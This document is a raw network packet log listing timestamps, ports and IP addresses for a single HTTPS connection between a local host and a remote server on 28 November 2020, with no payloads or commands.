Nov 28, 2020 10:25:19.263657093 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.263684034 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.263719082 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.263755083 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.263771057 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.263791084 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.263808012 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.263825893 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.263863087 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.263896942 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.263911009 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.263942003 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.263961077 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.263982058 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264019012 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264055967 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264060974 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.264091969 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264121056 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.264127016 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264166117 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264173985 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.264202118 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264245033 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264285088 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264312983 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264341116 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264379978 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264384031 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.264417887 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264420033 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.264455080 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264489889 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264508009 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.264528036 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264528036 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.264554977 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264597893 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264638901 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264655113 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.264677048 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264714003 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264727116 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.264750957 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264766932 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.264790058 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264826059 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264863014 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264877081 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.264908075 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264909029 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.264947891 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.264988899 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.265002966 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.265028000 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.265065908 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.265105009 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.265124083 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.265142918 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.265157938 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.265178919 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.265223026 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.265269995 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.270143986 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.270230055 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.270242929 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.270293951 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.270361900 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.270471096 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.270535946 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.270596027 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.270652056 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.271231890 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.271285057 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.271322966 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.271466970 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.271527052 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.271538019 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.271608114 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.271667004 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.272254944 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.272346020 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.272368908 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.272424936 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.272943974 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.272963047 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.272979975 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.273015022 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.273077011 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.273718119 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.273736000 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.273752928 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.273962975 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.274491072 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.274508953 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.274524927 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.274593115 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.274621010 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.275202036 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.275219917 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.275235891 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.275286913 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.275979042 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.275996923 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.276012897 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.276070118 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.276108980 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.276774883 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.276792049 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.276810884 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.276854038 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.277429104 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.277446985 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.277463913 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.277507067 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.277542114 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.278172016 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.278189898 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.278206110 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.278255939 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.278896093 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.278913021 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.278928041 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.278990984 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.279026031 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.279699087 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.279716969 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.279736042 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.279791117 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.280405045 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.280421019 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.280440092 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.280488968 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.280531883 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.281162977 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.281179905 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.281197071 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.281239033 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.281907082 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.281924963 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.281940937 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.282010078 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.282047033 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.282660961 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.282677889 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.282708883 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.282790899 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.283385992 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.283406973 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.283427954 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.283467054 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.283505917 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.284112930 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.284137011 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.284157991 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.284203053 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.284873962 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.284897089 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.284917116 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.284955978 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.285012960 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.285640955 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.285665035 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.285681009 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.285733938 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.286375999 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.286400080 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.286421061 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.286464930 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.286489964 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.287120104 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.287149906 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.287173986 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.287241936 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.287873983 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.287899017 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.287924051 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.287969112 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.287992001 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.288613081 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.288639069 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.288661003 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.288707972 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.289354086 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.289381027 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.289418936 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.289499998 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.290142059 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.290170908 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.290186882 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.290236950 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.290870905 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.290891886 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.290913105 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.290929079 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.290956974 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.291588068 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.291609049 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.291630030 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.291681051 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.292305946 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.292327881 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.292349100 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.292361021 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.292393923 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.293061972 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.293092012 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.293118000 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.293143988 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.293169022 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.293200016 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.294027090 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.294054031 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.294080973 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.294106960 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.294143915 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.294166088 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.295022011 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.295049906 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.295080900 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.295110941 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.295123100 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.295180082 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.295972109 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.296001911 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.296026945 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.296053886 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.296135902 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.296176910 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.296888113 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.296916962 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.296941996 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.296973944 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.297019005 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.297044992 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.297841072 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.297869921 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.297895908 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.297923088 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.297957897 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.297988892 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.298813105 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.298845053 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.298872948 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.298897982 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.298912048 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.298957109 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.299696922 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.299727917 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.299753904 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.299778938 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.299814939 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.299860954 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.300581932 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.300812006 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.300838947 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.300870895 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.300887108 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.300899982 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.300949097 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.301757097 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.301786900 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.301814079 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.301840067 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.301861048 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.301892996 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.302696943 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.302736998 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.302773952 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.302808046 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.302810907 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.302859068 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.303652048 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.303698063 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.303731918 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.303751945 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.303766966 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.303800106 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.304538012 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.304575920 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.304611921 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.304646015 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.304649115 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.304708004 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.305435896 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.305474997 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.305509090 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.305545092 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.305562973 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.305627108 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.306401014 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.306430101 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.306451082 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.306472063 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.306519032 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.306571960 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.307370901 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.307400942 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.307420969 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.307440996 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.307461023 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.307521105 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.308128119 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.308156967 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.308178902 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.308197975 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.308227062 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.308283091 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.308876991 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.308903933 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.308923960 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.308943987 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.308989048 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.309034109 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.309695959 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.309726000 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.309748888 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.309773922 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.309775114 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.309828997 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.310482025 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.310513973 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.310539961 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.310564041 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.310580015 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.310625076 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.311285019 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.311312914 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.311338902 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.311357975 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.311410904 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.311434031 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.312117100 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.312144995 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.312167883 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.312190056 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.312256098 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.312280893 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.312871933 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.312899113 CET	443	49738	162.159.130.233	192.168.2.6
